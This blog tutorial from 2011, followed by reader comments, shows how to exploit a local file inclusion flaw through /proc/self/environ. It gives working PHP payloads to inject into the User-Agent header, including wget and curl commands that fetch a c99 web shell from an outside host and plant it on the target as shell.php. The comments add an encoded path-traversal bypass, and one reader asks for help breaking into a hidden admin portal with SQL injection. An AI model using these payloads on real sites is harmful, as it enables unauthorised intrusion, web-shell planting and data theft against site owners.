Sunday, December 4, 2011

EXPLOITING LFI VULNERABILITIES via /PROC/SELF/ENVIRON

I previously covered how to exploit LFI vulnerabilities with FIMAP but have received some questions from folks due to FIMAP not always picking the injection points up. Automated tools are nice but if you don’t know how to do it manually then you can miss a lot of possible vulnerabilities and opportunities you can leverage to exploit your target (plus its good to know what goes on behind the scenes). Today I am going to show you how to perform LFI exploitation through the /proc/self/environ method. Here goes…

OK, so first we walk through our site and we notice a link which seems to be referencing another document on the server. This is a good place to start investigating potential LFI vulnerabilities.

We click on "Contact Us">>leads us to...

NOTE: page= appears to reference to another document on server (in this case contacts.php)

Let us see what happens if we replace the standard link with some arbitrary data:
              http://www.site.com/index.php?page=1

Now let us try to reference a real document which we know to be on all unix machines, /etc/passwd:


Voila! We can read the /etc/passwd file through LFI! This is good, but now we need to check to see if /proc/self/environ is accessible. If it is we can leverage it to get a shell on the target site. If it is not then we will need to further investigate which files we can access and then see if we can inject into any of them. I will only be focusing on the /proc/self/environ method for now, but may write another follow up in future to cover some of the other methods which can be used for LFI takeover. OK, so now we check for existance of /proc/self/environ:

NOTE the “DOCUMENT_ROOT=[VALUE]” on the returned page. This is the key indicator that we have access to the /proc/self/environ which we can now leverage to put a shell on the target site. We will accomplish this by injecting our PHP code into the User Agent field when we request this file again. Due to the way this is processed it will inject our code and then we can use to further escalate priveleges. We will now inject this code into our page request for /proc/self/environ and refresh the page.

Inject PHP code in UA field, like one of these:

We can now read the results of any of the commands we pass through in the User-Agent field, it will look similar to this:
ID: <?system('id');?>
UNAME: <?system('uname -a');?>

UPLOAD SHELL WITH WGET: <?system('wget http://www.sh3ll.org/c99.txt -O shell.php');?>
OR
UPLOAD SHELL WITH CURL: <?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>




NOTE: to inject the code into the User-Agent field you will need a add-on for your browser such as Live HTTP Headers, Tamper Data, or Burp Suite.

Once our code is injected we simply navigate to the webshell we just uploaded, should be located in site.com/shell.php unless you instructed it to go elsewhere when you used your WGET or CURL command for shell download. If your lucky when you go to your shell you will be greeted with something similar to this:

Now that you have a shell on the site you are fairly free to do what you want. I hope you have enjoyed another brief tutorial on LFI. I will try to work on follow up articles covering Log Injection methd and one or two more methods that can be used when the conditions are right. Until next time, enjoy!

3 comments:

  1. Replies
    1. You can try some basic bypass techniques for encoding path traversal and with the actual file name ..%2f..%2fproc%2f.%2fself%2f.%2fenviron for example OR find another injection vector

      Delete
  2. I dont get any error. Not with passwd nor with environ.
    The content area just goes blank...

    Any suggestions? I am trying to find the hidden admin portal where a SQL injection can be performed to gain access.

    ReplyDelete